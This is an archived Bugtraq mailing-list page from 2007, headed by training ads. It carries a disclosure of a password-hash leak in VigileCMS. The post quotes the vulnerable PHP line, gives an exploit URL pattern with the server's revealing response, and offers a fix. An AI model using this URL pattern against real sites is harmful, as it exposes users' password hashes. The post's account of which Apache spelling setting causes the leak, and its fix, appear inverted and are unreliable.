Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Trick] VigileCMS All Versions DataMining Remote Hash Disclosure

from [kingoftheworld92] Network Security [Permanent Link]
Subject: [Trick] VigileCMS All Versions DataMining Remote Hash Disclosure
Date: 25 Oct 2007 21:32:24 -0000 
---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org             Staff[at]inj3ct-it[dot]org 

---------------------------------------------------------------

VigileCMS All Versions DataMining Remote Hash Disclosure 
        (Works only whit Checkspelling off)

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC:

In apache, if the checkspelling propriety retourn "off", the HTTP error 300 
(Multiple Chois) is probably actived. So, VigileCMS, doesn't use any database, 
but save the users credentials in a php file. Let's read the code..

 $fp=fopen(USERS_TAB."/$_POST[utente].$md5.php","w");

This script make a file called username.md5hash.php located in /db/users . 
Surelly, while the developer was writing this code, he thought that nobody can 
find this file if he doesn't know the target md5...but usign the HTTP error, we 
can do it! We need to know only the target username!
---------------------------------------------------------------
Exploit:

http://[target]/[vigilecms_path]/db/users/[target_username]
---------------------------------------------------------------
In fact, if we try to visit that url, the server will answer:
---------------------------------------------------------------
Multiple Choices
The document name you requested (/db/users/[target_username]) could not be 
found on this server. However, we found documents with names similar to the one 
you requested.

Available documents: 
/db/users/[target_username].[target_md5_hash].php (common basename) 
---------------------------------------------------------------
How to fix:

Set "Checkspelling ON" on your apache.
---------------------------------------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Trick] VigileCMS All Versions DataMining Remote Hash Disclosure, kingoftheworld92 <=
Previous by Date:  Multi Host Forum Pro phpbb & ipb Multiple Sql Injection, kingoftheworld92
Next by Date:  [Full-disclosure] RealNetworks RealPlayer/RealOne Player/Helix Player Remote Memory Corruption, Piotr Bania
Previous by Thread:  Multi Host Forum Pro phpbb & ipb Multiple Sql Injection, kingoftheworld92
Next by Thread:  [Full-disclosure] RealNetworks RealPlayer/RealOne Player/Helix Player Remote Memory Corruption, Piotr Bania
Indexes:  [Date] [Thread] [Top] [All Lists]